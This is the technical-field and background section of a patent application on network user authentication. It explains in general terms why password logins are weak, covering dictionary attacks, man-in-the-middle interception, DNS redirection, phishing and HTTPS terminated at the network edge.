1. Technical Field
The present invention generally relates to network transactions and, more particularly, to facilitating user authentication over a network.
2. Related Art
Presently, many online web-based applications use password based user identity authentication. That is, a user is typically required to provide a user ID and password as a proof of identity before using an application. Generally, web-application users select a password out-of-band through a process known as registration to the site. During this process, which may be carried over a secure communication channel (e.g., Https), the user selects a password. During an authentication process, a password may be sent over a network from a web application as typed by the user. In many cases, this password exchange occurs over a secure communication session. Typically, the user provides the known password when prompted by the web application.
Even though password authentication is used in many web application settings, there are many security concerns with password authentication. For example, many passwords chosen by web users are weak. These user-chosen passwords are typically short, use few of the allowable characters in the password mix, and are sometimes easily guessable because they are based on the user's child name, pet name, hobbies, etc. In general, weak passwords may be easily compromised by hackers using algorithms, such as a Dictionary Attack.
In another example, since a password is sent over a network, there may be some leakage of data and information to a man-in-the-middle having successfully eavesdropped on information transferred over the network. Eavesdropping may be accomplished with ease and in more common settings than is generally noticed. For instance, many banks and web applications (e.g., electronic commerce (eCommerce) pages) use an Http page for web site navigation. For example, when users are ready to sign-on, they are redirected to a secure Https page. However, by this time, it may be already too late if an eavesdropper or a man-in-the-middle has been able to successfully proxy the user's request. If the eavesdropper or man-in-the-middle is able to do a DNS (i.e., domain name server) attack and redirect the external site to its proxy, then users may think that they are connecting to their bank or eCommerce site securely, but in actuality, users are connecting to a proxy site which in turn has a secure connection with the end site. At this point, any confidential information entered by users may be compromised.
In another example, password based authentication is prone to phishing attacks where users are redirected without their knowledge to a phishing site. Once redirected, users are then phished for confidential information, including passwords.
In another example, many password authentication protocols require the use of Https for secure end-to-end transmission of passwords over the network. However, in many high volume eCommerce and financial settings, the Https protocol may be terminated at the edge of a web application network. As such, any confidential data in the payload (e.g., passwords or related hash values) may be sent over the network with standard Http (e.g., in clear-text, in many cases) protocol.
Accordingly, there exists a need to improve network security when authenticating user identity so as to inhibit illicit access to personal data and information.